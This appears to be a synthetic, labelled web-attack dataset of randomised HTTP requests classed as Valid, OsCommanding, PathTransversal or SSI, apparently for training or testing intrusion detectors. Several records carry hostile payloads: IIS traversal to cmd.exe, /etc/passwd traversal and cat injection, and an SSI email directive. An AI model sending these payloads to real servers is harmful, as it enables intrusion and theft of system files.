UA-Color: color16
UA-Pixels: 794x6621
Via: 0.1 178.59.127.94
Transfer-Encoding: deflate
Upgrade: iro/0.9, dcset/6.0, xNs9ee/6.4, 9eaii/4.5, msw/6.6
Warning: 741 www.rweia.css "ro7ottxtixwG8b2" "Mon, 03 Nov 08 11:02:06 CET"
X-Forwarded-For: 177.184.78.1
X-Serial-Number: 189697977036477
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27610
Start - Id: 11059
class: Valid
GET /r4tD9oJgxOVVUQ93Peq/ilhEjKyO1eFeh/g6@qU/enani5tjerS.jpeg?omEiSwnLayge=2759220&eeb8gzti7n=sXz7T2&iwasaagjonos=ue%29&hnnrghkei=tlstyleei&MLmtdry=93185&yuetc3D2KB1tcc=957793&tctoPs4d=aA76q-QIBk&Nqgbhtserd=+saf&LCx1titna9gxcx=918&n7wnau6fe=165&ao2aT=%24he9&cee=soqns&r7roSuhHt=vbscript6aw+&htTnf7ts1i=52350188 HTTP/1.1
Host: www.pLdatpseew.gov:80
Connection: keep-alive
Accept: text/html, text/xml
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, gzip;q=0.4, gzip;q=0.8, gzip, identity
Accept-Language: e-onheiu, cHqNni6e-18aobani;q=0.8, ta-s;q=0.8
Cache-Control: no-cache
Client-ip: 224.189.199.226
Cookie: ewvtuItos=2345178813
Cookie2: $Version="383"
Date: Tue, 31 Jan 06 16:31:49 GMT
ETag: "5ceGnLW7Rm.THDjabofc"
Expect: 7bds
From: e9esarYc@ncTsfi.org
If-Modified-Since: Sun, 25 Oct 09 15:34:52 CET
If-Unmodified-Since: Sun, 10 Jun 07 05:16:18 GMT
If-Match: *
If-None-Match: "Op7S5BASabSCVq6j8Ir"
If-Range: *
Max-Forwards: 91
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: aeeWg xqe5owa=r1ap5OA
Authorization: Digest username="Meeestct"
Range: -26420,731526-452811,442365-468
Referer: http://www.snnD.be/OMeonca/7na3sl7.mpg
TE: deflate;q=0.1,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/0.0 (X11; U; Open BSD i386 9.4; od-gI; rv:2.5.8) Gecko/66063563
UA-CPU: x86
UA-Disp: 0717,4017,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1068x1035
Via: FTP/1.9 79.70.171.163, neq/5.0 181.36.207.116
Transfer-Encoding: identity
Upgrade: orc/1.6, 9fle/6.2, 08otw/8.4, Zmleef/2.9, tDi/7.7
Warning: 864 42.215.124.198 "smicegomrl2AdEeez" 
X-Forwarded-For: 42.148.64.117
X-Serial-Number: 5468318216
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11059
Start - Id: 6721
class: Valid
POST /7tAmail.GSEGZTidgroup by/Neq6pihomeUHidva/ecQjMgsP.sh? HTTP/1.1
Content-Length: 135
Content-Language: an,huo5
Content-Encoding: compress
Content-Location: http://ustbiat.com/dmeTs/ade6c.asmx
Content-MD5: YkU3MWltc2VvaWRvY2xuOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Nov 09 18:53:50 UTC
Last-Modified: Thu, 09 Aug 07 01:44:23 UTC
Host: www.oiWt1yo0n.cz
Connection: 01rtry
Accept: */*;q=0.1
Accept-Charset: iso-8859-7, big5;q=0.3, macintosh;q=0.8, us-ascii;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 228.32.232.19
Cookie: h1eoeda5d=eievoWs36btrlbmwhh;esttqi=849;6tdneiD=List
Cookie2: $Version="46"
Date: Wed, 03 Aug 05 05:33:02 CET
ETag: "tctgsMDscXS1S40"
Expect: seLeerFe
From: uo9blte@Ic9o.com
If-Modified-Since: Fri, 27 Jul 07 14:08:39 GMT
If-Unmodified-Since: Fri, 28 Jul 06 18:06:42 CET
If-Match: *
If-None-Match: "FKzlYgJkIGc6JZEv0"
If-Range: "_aWmrOeemcPnoXc0t"
Max-Forwards: 7110
MIME-Version: 7.6
Pragma: e=nwry7fop
Proxy-Authorization: Digest qop=auth
Authorization: cunaee otad=esmQ1jz0
Range: 38-1,16854-
Referer: http://aidba.net/icretr.js
TE: gzip,deflate
Trailer: Max-Forwards
User-Agent: rlasmqho5niisLmToAm
UA-CPU: Sparc
UA-Disp: 053,477,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1839x456
Via: 9.3 100.5.15.151:4
Transfer-Encoding: identity
Upgrade: rxTi/0.2, yuint/8.4, nhwc8/4.6
Warning: 825 18.154.201.40:52524 "alxpneotthwrdet" 
X-Forwarded-For: 6.218.56.206
X-Serial-Number: 48758
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

4ameEeEzrbea=n&68=b-RpaN3M&niwoasp=iclE&hut1emoyknleelM=el.5@uxXi&tAO8home_=ayhaebs&reg3Qefe=nTheTPHG7&den7dcesOsB=9287084910&dedu=49

End - Id: 6721
Start - Id: 11467
class: Valid
GET /dnsssrehap/nryqoInalR8lljwjfg/cCtrmailqe9JN_Bboot.iniS/yeEelreWssfatad/hd.cfm?syai=te+m+&spmGo=mie6m&RdIi1fes7em=ma%3En+ebnrevbscriptepnie%3F1%24&oora3c=nezh%3Egia2ht&bCf8netcat=teftpa%3F&cdxv44=oe5uRq&hfehgetj=+4&hreceEotgx=286617145&Niz=9&trjp=tBe4J-9os&ineoow=rIg3&wic=e7%40G5z&fYvtR=sjycVNk1Cmx&fonrsr=7369146 HTTP/1.1
Host: 66.202.32.4:72
Connection: close
Accept: image/*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 99.123.25.254
Cookie: picuopt8-Q=eild3tsgtt+t;7nid=dtrTleuaks
Cookie2: $Version="342"
Date: Mon, 16 May 05 01:15:11 CET
ETag: "lod1jdbzQIxznE7tPD"
Expect: Ltee=5hao
From: oohw@halud.org
If-Modified-Since: Sun, 15 Feb 04 04:05:10 CET
If-Unmodified-Since: Sat, 26 Aug 06 07:52:00 CET
If-Match: "s4QaZhfojdj_BFvfeCD"
If-None-Match: *
If-Range: "GhHeQ65@oF_uP4cC4M"
Max-Forwards: 93
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nbeqv"
Authorization: NTLM ZVhvY2JyU3NtZWNmaGVJcnJ2MmFlbnN4NGV5bzdlZHNtY2UwdQ==
Range: 31-
Referer: http://www.ooNDk.fr/dsside/gjthy/oab3h/toy2/Ynsldd.exe
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.7 (compatible; MSIE 3.3; Linux i586; astrye; Oontrm; nolBstl)
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9366x217
Via: 7.6 216.13.10.201, HTTP/3.6 17.82.20.59, os7sJ/6.8 50.54.79.47
Transfer-Encoding: gzip
Upgrade: nvEn63/4.1
Warning: 637 201.192.41.129 "rnbehkrn" 
X-Forwarded-For: 54.109.53.253
X-Serial-Number: 684447475496
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11467
Start - Id: 6400
class: Valid
PUT /8WsdF0/deelomJseti.html? HTTP/1.1
Content-Length: 111
Content-Language: qvsursfh,Eex
Content-Encoding: identity
Content-Location: /S4ersd/4iht/erani2l.pdf
Content-MD5: cnRuTmFzMm9lRWVsNGhteA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Jun 08 17:20:50 GMT
Last-Modified: Fri, 28 Sep 07 11:08:58 GMT
Host: www.mveSoWnhc.de
Connection: keep-alive
Accept: text/*, video/mpeg, video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6717
Client-ip: 242.125.64.251
Cookie: tdtcnrz4e=eehts+ogp;lt=iematoIn6mQml;igtinmar=hftmNO
Cookie2: $Version="6"
Date: Wed, 19 Apr 06 17:51:41 UTC
ETag: W/"Y1PbMR02h9TYZ9t@EI"
Expect: 100-continue
From: 3ufsuet@tvsRo.net
If-Modified-Since: Sat, 17 Jun 06 17:06:59 GMT
If-Unmodified-Since: Tue, 13 Oct 09 03:45:09 GMT
If-Match: "4UaXNTyy@c5WbN0Jn"
If-None-Match: "qXriyl312j4mos7kV"
If-Range: *
Max-Forwards: 121
MIME-Version: 4.1
Pragma: aGhh='ioeei'
Proxy-Authorization: Digest nc=A75dbFB1
Authorization: NTLM Z2Vsd2ltb1F4dXRzOWh1QWRNcmNNYTBEZGdlc0FiZ2F1b3JlaXRhcnRrbnJl
Range: -46641,596587-2635,975-1
Referer: /lpU5oauj.jpg
TE: trailers,chunked,trailers
Trailer: Accept-Charset
User-Agent: aetx (ntQDTLtmym; 6kzAuRqU2; vs1TjKQaG@; pCbuwnt)
UA-CPU: 68000
UA-Disp: 131,664,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4815x4543
Via: 7.7 61.139.120.204, 6.6 144.254.233.214, 3.3 201.207.225.91:65149
Transfer-Encoding: compress
Upgrade: eni9l/2.0
Warning: 092 25.253.148.164 "1r7defgs" "Mon, 19 Nov 07 22:00:11 UTC"
X-Forwarded-For: 249.70.40.54
X-Serial-Number: 10020198390
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

asoEOiec=]Z\7we7dbsPservices-&2Losrau0ed=ea3einerkebb&1gQ-Q=7de=|btdf t83lahtinpute&Oetrxi=6&oea2=15910

End - Id: 6400
Start - Id: 44063
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.uOecTit8h.org
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: identity, identity, identity;q=0.1
Accept-Language: *;q=0.3
Cache-Control: r='ien8yyle'
Client-ip: 185.93.146.213
Cookie: suuhctekd=840;G9MN8V7sQ2U=hseo;aEnycwigmeb=235125;xuz=46618;dliTNfsd4g03oi=kiew
Cookie2: $Version="43"
Date: Fri, 26 Jan 07 18:33:04 UTC
ETag: W/"8jJSMp1FL9CwR-.L4"
Expect: 100-continue
From: ctHO@rsrvtl.cz
If-Modified-Since: Wed, 11 Oct 06 11:18:01 UTC
If-Unmodified-Since: Sun, 11 Jan 04 07:13:57 UTC
If-Match: "UPwvHzNH49-3_djtCxyb"
If-None-Match: "PpmnxhuvcL8N-J4"
If-Range: "VjmHRKHX8mz6peRSE9CL"
Max-Forwards: 5863
MIME-Version: 2.6
Pragma: bA=eHy
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: Digest nonce
Range: -4867,66-33,-6
Referer: /ss43oaa.aspx
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: xec5yshah0/6.9.4.5
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: 8.6 www.cbtGUa.shtml
Transfer-Encoding: compress
Upgrade: Rjwza/4.8, tein/1.3, crss4/4.1
Warning: 175 26.216.110.35 "tt5rn4Ks" "Fri, 26 May 06 17:19:02 GMT"
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 412280187
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44063
Start - Id: 43842
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 52.34.172.80:80
Connection: close
Accept: application/*;q=0.3
Accept-Charset: euc-kr, x-mac-hebrew;q=0.8, iso-8859-7, windows-874, windows-1255
Accept-Encoding: deflate
Accept-Language: itgeRm-nktur9, zhateio-e5
Cache-Control: no-transform
Client-ip: 34.114.34.166
Cookie: JfGmailrcpuSXH=e3ZAPZorJJ;mtnteautqe=2650582907;04ev=pn3i1of;fr=naaionfetsi
Cookie2: $Version="8"
Date: Thu, 08 Nov 07 10:26:12 CET
ETag: W/".sct7BWXt05NrErz5B"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 27 Jan 09 24:06:23 CET
If-Unmodified-Since: Fri, 19 Jun 09 13:22:59 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: "Z78AdnrM@.z.am-"
If-Range: Tue, 13 Mar 07 02:44:46 CET
Max-Forwards: 4923
MIME-Version: 1.4
Pragma: aeriel='oyet9ss'
Proxy-Authorization: Digest uri=/Ieiete.jpg
Authorization: Basic YXJvbmU6Y3QwdHRv
Range: 653-,494-99921,2-094773
Referer: http://o9winUyi.de/aOttD/thQtnshe/irece6.exe
TE: trailers
Trailer: Accept
User-Agent: Mozilla/1.4 (Machintosh; U; PPC Mac OS X 9.6; te-ip; rv:0.5.7) Gecko/87146961
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6925x167
Via: FTP/4.8 www.hAhbihn6.jpg, FTP/8.9 www.dErseaoi.gif, 7.1 www.akdpg.htm
Transfer-Encoding: compress
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43842
Start - Id: 20461
class: Valid
GET /deAch@RHPpZ2R1CB6x/nEm/spjid.htm?_OPItelnet.dk85=accept%3B%26tmpxutt4wgettElese&sp=ev+n+EThvste3e&plrmeefaah0iysc=wbs&dfe=3257&JzW32aY0azGA-=uKq&nraa3ydevoqei=eobject&A-1EfYFTIqT=022&xtsaA5nmcz=2eep&srndon3ew1m=hQ4&90T7Bo1pteecod=%3Ap6we%40syrw%26iknwgetea&munor=o+paetcAs&rob0a=%28n HTTP/1.0
Host: 191.218.101.156
Connection: close
Accept: audio/basic, application/postscript
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.8, deflate;q=0.1, deflate;q=0.4
Accept-Language: 5i9-sahr, easndjt-iotth, r-agdcd
Cache-Control: max-age=48
Client-ip: 83.158.227.172
Cookie: 0aabeoilsz=0813;eespiidjhkcued=8217;zegrnreoseaetEt=t1dKq1ZTZP;aerije=c13c;VCZRWZ=9
Cookie2: $Version="2"
Date: Sat, 17 Nov 07 24:55:23 UTC
ETag: W/"ULyg1rb0SVstg9wIa"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Sun, 28 Nov 04 14:49:01 GMT
If-Unmodified-Since: Wed, 17 Mar 04 14:26:14 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic bG5yZWNpOmlubzc=
Authorization: eIIr dceso=5qeES
Range: -896,61-724379,-171
Referer: http://osiet.it/dz8iaski/2alRu/reatenes/nshgj.css
TE: trailers
Trailer: From
User-Agent: ntssTz/3.5.4
UA-CPU: StrongARM
UA-Disp: 615,202,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3372x6941
Via: FTP/7.9 www.lRlna.png, HTTP/3.3 www.haree.js, 4.4 209.13.168.43
Transfer-Encoding: eco4i; nknswnjs=ythpeh
Upgrade: tt2t/3.5, h7sw/2.6, orae/2.0, use/2.6, esmt/6.9
Warning: 884 199.42.171.133 "deaa4rmnb5" "Fri, 14 Aug 09 11:14:45 UTC"
X-Forwarded-For: 69.102.148.135
X-Serial-Number: 4599369837031891295
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20461
Start - Id: 46037
class: PathTransversal
GET /nGvvUvWR8-Q3/ouR46xQJaCs-/oNH2Yh7jj6aB1Hjc1/5nkM/rdsnpdiozkadEhage/bebftpZ4includeifL994L/fe3ie/tvdgiegi1meheRl/5jbeiaa.php?uUees=bojNeMlTaupn&d97aec=awunionny%29tbhfivA&afletold=61698&tdCaeLNlsttas=ol HTTP/1.0
Host: 181.28.143.91:80
Connection: close
Accept: video/*, application/*;q=0.3, video/*
Accept-Charset: iso-8859-5, shift_jis;q=0.4, koi8, gb2312;q=0.7, iso-8859-8
Accept-Encoding: ../../../../../../../../../etc/passwd
Accept-Language: 8rbe-7gea
Cache-Control: max-age=1
Client-ip: 62.95.118.93
Cookie: iinatoqy1=);eierehs=Arlinsertm;oehqh=20436595;afehzefx=h"tuki| a"6mriobject
Cookie2: $Version="01"
Date: Wed, 27 Feb 08 18:53:13 GMT
ETag: W/"l-ItnQaJptc0A4EyShE-"
Expect: olLo=ev0eans
If-Modified-Since: Wed, 02 Jan 08 20:49:43 UTC
If-Unmodified-Since: Tue, 23 Dec 08 03:56:51 UTC
If-Match: "1DKLAE8Z102@qgZq"
If-None-Match: "@Q-2p3PXvj53esvrCofY"
If-Range: *
Max-Forwards: 2504
Pragma: no-cache
Authorization: Basic NWltdW46ZXMybzU5
Range: 96418-,-1,193-
Referer: /rqo66r.exe
Trailer: Accept-Language
User-Agent: Mozilla/7.9 (Windows; U; Windows NT 8.3; yr-r4; rv:4.0.4) Gecko/07533132
Via: 2.6 63.146.63.218, FTP/3.9 www.autu.tiff:717
Upgrade: n41se/5.7
Warning: 967 www.etmh8ee.tiff "wey2naaecwy" "Wed, 20 Jul 05 21:29:25 GMT"
~~~~~: ~~~~~~~~~~~

null

End - Id: 46037
Start - Id: 18857
class: Valid
GET /isoCdnuleddae9l3lc/i9w3S5/f5AzHhCM0/oMu4vpQaPfBF9YelJe./n0zTBP/omrrnoni0savseahro/xSHg4YpNy/avmiea/aihxgeriefc/oHtcdithrtdjte/ryO9TlZ.U/upWZS23viP.php3?mr6EqYt=%7E%7E0e&mhwutzdn=2790925&cene0oion=lsdr2aosystem&hZinsertuG4FMX0=i3S&tit9=rrZcPGW2&Z2JIRsobjectWn=56 HTTP/1.1
Host: 30.17.168.209
Connection: 3iuie3a
Accept: text/*;q=0.9, text/*, audio/*;q=0.2
Accept-Charset: iso-8859-15;q=0.3, gb2312;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 108.170.236.163
Cookie: enls=19
Cookie2: $Version="1"
Date: Tue, 10 Oct 06 02:50:31 UTC
ETag: W/"6ZrYY90QHeyeZaJNoL1G"
Expect: 100-continue
From: oiir0@raaeopgcl.it
If-Modified-Since: Sun, 07 Sep 08 13:11:18 GMT
If-Unmodified-Since: Fri, 15 Apr 05 04:12:45 GMT
If-Match: "gFc@P5Sgn-rAK@3h27"
If-None-Match: *
If-Range: "51goknJd9DJJ2Cg8"
Max-Forwards: 034
MIME-Version: 6.9
Pragma: rDLmyTio='ouamo'
Proxy-Authorization: jniene rlc0of=edatai
Authorization: Digest opaque="urietee"
Range: -4
Referer: /l2Bitoc/gaoirhoo.html
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 0.5; 7e-ch; rv:2.3.3) Gecko/47953115
UA-CPU: PowerPC
UA-Disp: 708,1125,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 928x9572
Via: 2.3 www.w5fnIuo.gif, 9.1 www.szrgro.js:92
Transfer-Encoding: compress
Upgrade: sst/1.2, yoeg/0.2, eryeo/8.7, fnres/9.9
Warning: 764 36.12.45.78 "losey4rd3" 
X-Forwarded-For: 77.105.66.53
X-Serial-Number: 8138044161
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18857
Start - Id: 28853
class: Valid
GET /scJ9OOvr.cu_WGMA.php3?rf=lmyae7ji%3Aae+&0ym=dsonexfuaTtflg&oen=g%26dfoeluA%40rYexecw%40&miaha=768448&sya=ly&tqut=498748222&wsvbscriptdhtaccesl9=nm%3B6tnt6esd HTTP/1.0
Host: 76.28.222.61
Connection: close
Accept: audio/basic;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 180.229.35.171
Cookie: fPXW@PI=k\Ac8r
Cookie2: $Version="434"
Date: Tue, 13 May 08 17:01:16 GMT
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Sun, 03 Jun 07 09:48:31 GMT
If-Unmodified-Since: Tue, 13 Apr 10 18:39:10 GMT
If-Match: *
If-None-Match: "cto43kiyXwcZgdy"
If-Range: Tue, 25 Dec 07 01:36:13 GMT
Max-Forwards: 5
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM Mmhzb21iY2FuY2h6aGJpbnZqZWU1cHFmanhkd2psSGduNmRvYXR0ZW51bjQ=
Authorization: eeeae stTE=trhaWn
Range: 745-,-41
Referer: http://www.3zr5t.st/ifuyge.nsf
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/9.9 (X11; U; Open BSD i586 8.3; uc-2y; rv:8.2.9) Gecko/82595485
UA-CPU: x86
UA-Disp: 3377,8553,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 122x5513
Via: HTTP/1.7 151.137.117.19, FTP/5.0 www.Ete7.jpeg
Transfer-Encoding: compress
Upgrade: utaps/8.7, onEusT/9.3
Warning: 922 www.ubnuse.css:110 "dtop6Gueohos2s9" 
X-Forwarded-For: 102.241.28.31
X-Serial-Number: 661775
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28853
Start - Id: 31480
class: Valid
GET /tGpJ/0hongaiEub9/dTVshD8racnt/jch433K.Ld/dazgdTein83joemgap/ylinkYNZqP5gwA.U/gED8g4WC2nWlXeJLG/fOraTxne9/6dmrUiUNeansndSt/3lvprocessing-instruction4W.bin? HTTP/1.0
Host: 2.184.152.216:80
Connection: nr1ertej
Accept: */*
Accept-Charset: cp-936, iso-2022-jp, windows-1251, x-mac-icelandic
Accept-Encoding: 
Accept-Language: Og-J
Cache-Control: e=y
Client-ip: 242.224.6.251
Cookie: DdMWPSdSDkS=620038
Cookie2: $Version="85"
Date: Thu, 26 Mar 09 08:17:29 GMT
ETag: "z5qe4Irdv2CK-uXQ"
Expect: ti5e
From: ezwbEaos@cnssbw9.org
If-Modified-Since: Fri, 03 Dec 04 22:29:22 CET
If-Unmodified-Since: Tue, 27 Mar 07 15:33:56 GMT
If-Match: *
If-None-Match: "PcxEe5.mgNLhVNCE3dm4"
If-Range: Thu, 20 Dec 07 09:30:29 CET
Max-Forwards: 0
MIME-Version: 7.9
Pragma: RlaI=r
Proxy-Authorization: Digest nc=Dbc2bcCc
Authorization: Digest opaque="o5tmz9e"
Range: 5020-
Referer: /ce5rtp/o5oa.tiff
TE: trailers
Trailer: Connection
User-Agent: Mozilla/5.7 (compatible; Konqueror/6.6; Open BSD i386; GodesrueTu)
UA-CPU: Sparc
UA-Disp: 4970,305,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 484x1465
Via: 7.1 www.tenaT9.html, snm/5.1 www.snrai.png
Transfer-Encoding: Sczz
Upgrade: edf/0.2
Warning: 334 186.45.95.188:492 "4a7905aupt5ae" "Thu, 09 Aug 07 05:54:53 GMT"
X-Forwarded-For: 159.122.226.252
X-Serial-Number: 8380011
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31480
Start - Id: 39452
class: SSI
GET /ttd8/MtmprAGiZaga0svCV/B_Zlogt.6_/may76AnEOaIsi/3io.OGlib2jwn8HrcpU/FbzreplaceNI/DiyU2nc/dyE1cYxCHA3cZ5dfT20/nxnb.php4?sar=1203&4ywl=eex&bIuAq=mkc&egtaaeristRIw=%3C%21--%23email+fromhost%3D%22www.p4I9Nl.com%22+tohost%3D%22mailbox.end.com%22+message%3D%22etpi+eanaTii+e8ec+oet%22+fromaddress%3D%22dkuit.com%22+toaddress%3D%22hmt.es8.com%22+subject%3D%22tnl%22+sender%3D%22cy.com%22+replyto%3D%22iaoa0n.com%22+cc%3D%22Hocy%22+inreplyto%3D%22ewd+vrec+er%22+id%3D%22otmail%22+--%3E&oiruqgaro=oceo2&8psWb=d0Sozrhun HTTP/1.0
Host: 73.138.152.14:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hr-arjfH, eingrh-SalhMOd, es-ahiwc4De;q=0.0
Cache-Control: no-store
Client-ip: 179.178.240.191
Cookie: hevigbl=83033;rejLmSil=e tje5wgetn;tii82hinhdD=eoih? hAiu4a;daswlezeber=56955;oinanhtbta30=irz0yiaox2wtytte
Cookie2: $Version="52"
Date: Sat, 20 Oct 07 14:05:29 UTC
ETag: "9IoTjE7RG-@vwbCw7M@"
Expect: 100-continue
From: alitInca@hE8o0.it
If-Modified-Since: Wed, 09 Aug 06 09:05:52 CET
If-Unmodified-Since: Thu, 06 Jan 05 04:52:26 GMT
If-Match: *
If-None-Match: "JWlT5x3vHYCnrL-BBY"
If-Range: *
Max-Forwards: 2
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest nc=86787AdC
Authorization: Digest uri=http://trht.gov/eoingNKe/cmesehn.mspx
Range: 993-
Referer: http://eoida.org/osdete.conf
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.7 (Machintosh; U; Mac OS X 3.4; up-il; rv:9.4.1) Gecko/77156851
UA-CPU: Sparc
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x2523
Via: srH3tn/7.4 160.214.66.136
Transfer-Encoding: gzip
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 799 37.15.16.235:0423 "eauhqipdaedde" "Thu, 30 Aug 07 24:57:07 CET"
X-Forwarded-For: 38.112.178.33
X-Serial-Number: 298841177786
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39452
Start - Id: 43444
class: OsCommanding
GET /4ven7m/t1d/oat/sCYBrrWV/ghaZJN@L_Lml2-/sCp9nf/Onysh/1c@9SdxHf7.Xc/njk0e8BVBk_8.js?UQcFgxmlCPI9eb=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fcat+++%2Fetc%2Fpasswd%7C&gEpbrt=%29shtpass HTTP/1.1
Host: www.saa118as.it:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: fp-iducZ;q=0.2, taieowz-eTrh8hd;q=0.2, sgg-uYpm4n4j, eCmzaek-n;q=0.9, dem-dkfed5Ac;q=0.9
Cache-Control: eosEt=u8eeray
Client-ip: 87.24.160.134
Cookie: 2eoamuLaiL8gs=6s e;gaoethe0ho99=ctohtacces2e>OqeiFstst:ceO
Cookie2: $Version="178"
Date: Sat, 13 Oct 07 01:42:54 CET
ETag: W/"J3rodTGe@9EySOL0.e"
Expect: a9incnt
From: TsoHtl@c9ggR2do.cz
If-Modified-Since: Mon, 16 Feb 09 09:19:44 CET
If-Unmodified-Since: Wed, 17 Mar 04 11:06:59 GMT
If-Match: *
If-None-Match: "ZzFNucn.EnucQgC"
If-Range: Thu, 11 Oct 07 14:49:18 CET
Max-Forwards: 4969
MIME-Version: 4.0
Pragma: e=ale
Proxy-Authorization: Digest qop=alb2ja0
Authorization: VPri otoheooh=enai
Range: -0418,311-
Referer: http://www.t30ebdt.org/t6ihdot/4uHw.sh
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: dxeluy
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 801x1629
Via: 1.3 www.rzt5j.css:0185, 0.5 121.254.86.178, 4.8 www.aoe7uh.js
Transfer-Encoding: gzip
Upgrade: M4r/6.8, Aiye/1.9, wtraey/9.2, Ana/1.3, Na5he/7.8
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 111.88.109.86
X-Serial-Number: 848685
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43444
Start - Id: 46237
class: PathTransversal
GET /eaE/iuemlfAseqs/teAtAUEYE5VV/27m/baiuaah.jsp?iawsdrq=i%3B&srolhtl=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&Qtluhbkeaaf8=3xp_u%2B5+dwget%3Fk&HViHCTr=rmeuhbeLllink+&mp=30955447&ritaR=240690818 HTTP/1.0
Host: 255.236.43.204
Connection: hntet
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.0, gzip
Accept-Language: *
Cache-Control: max-age=401
Client-ip: 239.42.171.202
Cookie: NXQh8KPlibody=tkskuf;uri9ets=a;WGRmav=5246;d7bctiessfoksRe=do-;rhetenn9sh78y=euglmof;b99_kE=em>>CM  otuf
Cookie2: $Version="8"
Date: Fri, 25 Jan 08 10:02:31 CET
ETag: W/"yMpHQWskc4VwTC_CTlsa"
Expect: eoetAt
From: eftra@neleobejy.com
If-Modified-Since: Thu, 26 Aug 04 06:41:40 GMT
If-Unmodified-Since: Sun, 12 Jun 05 11:08:16 UTC
